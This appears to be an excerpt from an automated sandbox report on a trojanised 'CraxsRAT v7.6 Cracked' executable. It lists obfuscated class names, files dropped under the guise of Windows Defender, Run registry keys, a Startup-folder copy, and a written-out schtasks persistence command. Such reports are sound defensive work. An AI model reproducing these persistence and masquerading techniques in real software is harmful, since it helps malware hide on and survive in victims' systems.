Source: Windows Defender Notification.exe.0.dr, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs	High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: Windows Defender Notification.exe.0.dr, qOI2DzwDff.cs	High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, v9OXbFpunZ.cs	High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs	High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs	High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs	High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, uUAcd1V7wC.cs	High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs	High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, qOI2DzwDff.cs	High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'
Source: Windows Defender Notification.exe.10.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: Windows Defender Notification.exe.10.dr, v9OXbFpunZ.cs	High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: Windows Defender Notification.exe.10.dr, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: Windows Defender Notification.exe.10.dr, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs	High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: Windows Defender Notification.exe.10.dr, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs	High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: Windows Defender Notification.exe.10.dr, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs	High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: Windows Defender Notification.exe.10.dr, uUAcd1V7wC.cs	High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: Windows Defender Notification.exe.10.dr, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs	High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: Windows Defender Notification.exe.10.dr, qOI2DzwDff.cs	High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'

Drops PE files

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File created: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Notification			Jump to behavior

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe			Jump to behavior
